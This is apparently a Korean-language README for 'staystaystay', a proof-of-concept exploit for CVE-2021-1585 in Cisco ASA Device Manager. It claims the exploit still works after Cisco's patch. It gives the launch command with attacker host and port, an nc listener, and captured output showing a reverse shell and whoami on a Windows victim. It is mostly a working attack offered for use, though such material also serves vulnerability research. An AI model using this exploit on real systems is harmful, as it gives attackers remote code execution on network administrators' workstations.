
CVE-2021-1585 개념 증명: Cisco ASA Device Manager RCE
staystaystay는 CVE-2021-1585에 대한 개념 증명 익스플로잇입니다. 이는 Cisco ASA Device Manager(ASDM)에 영향을 미치는 중간자 공격 또는 악의적 엔드포인트 RCE 문제입니다. 이 문제는 원래 Malcolm Lashley에 의해 발견되어 2021년 여름에 공개되었습니다. 하지만 제가 조사할 당시 최신 버전(ASDM 7.17(1))에서 패치되지 않았으며, 저는 이 문제를 독립적으로 발견했습니다.
Cisco는 ASDM 7.18(1.152)에서 이를 "수정"했습니다. 제가 "수정"이라고 말하는 이유는 이 익스플로잇이 여전히 잘 작동하기 때문입니다. 사용자는 "예"를 클릭하기만 하면 됩니다. 아래 동영상을 참조하세요.
공격자는 피해자에게 리버스 셸을 획득하기 위해 두 가지 유형의 페이로드를 구성할 수 있습니다:
피해자가 ASDM을 staystaystay에 연결하면 구성된 페이로드가 주입되어 리버스 셸이 생성됩니다. jjs 리버스 셸은 일반적인 nc 리스너(또는 원한다면 Metasploit)로 잡을 수 있습니다. Longtime Sunshine 옵션은 공격자가 해당 프레임워크를 사용해야 합니다.
예를 들어, 다음 명령은 jjs 페이로드와 함께 포트 8443에서 staystaystay를 시작합니다:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
피해자가 8443에 연결하면 10.0.0.2:1270으로 리버스 셸이 생성됩니다:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
다음 동영상은 Longtime Sunshine을 사용한 익스플로잇 예시를 포함합니다:
다음 동영상은 패치된 버전에 대한 공격을 보여줍니다:
AttackerKB 분석은 여기에서 찾을 수 있습니다: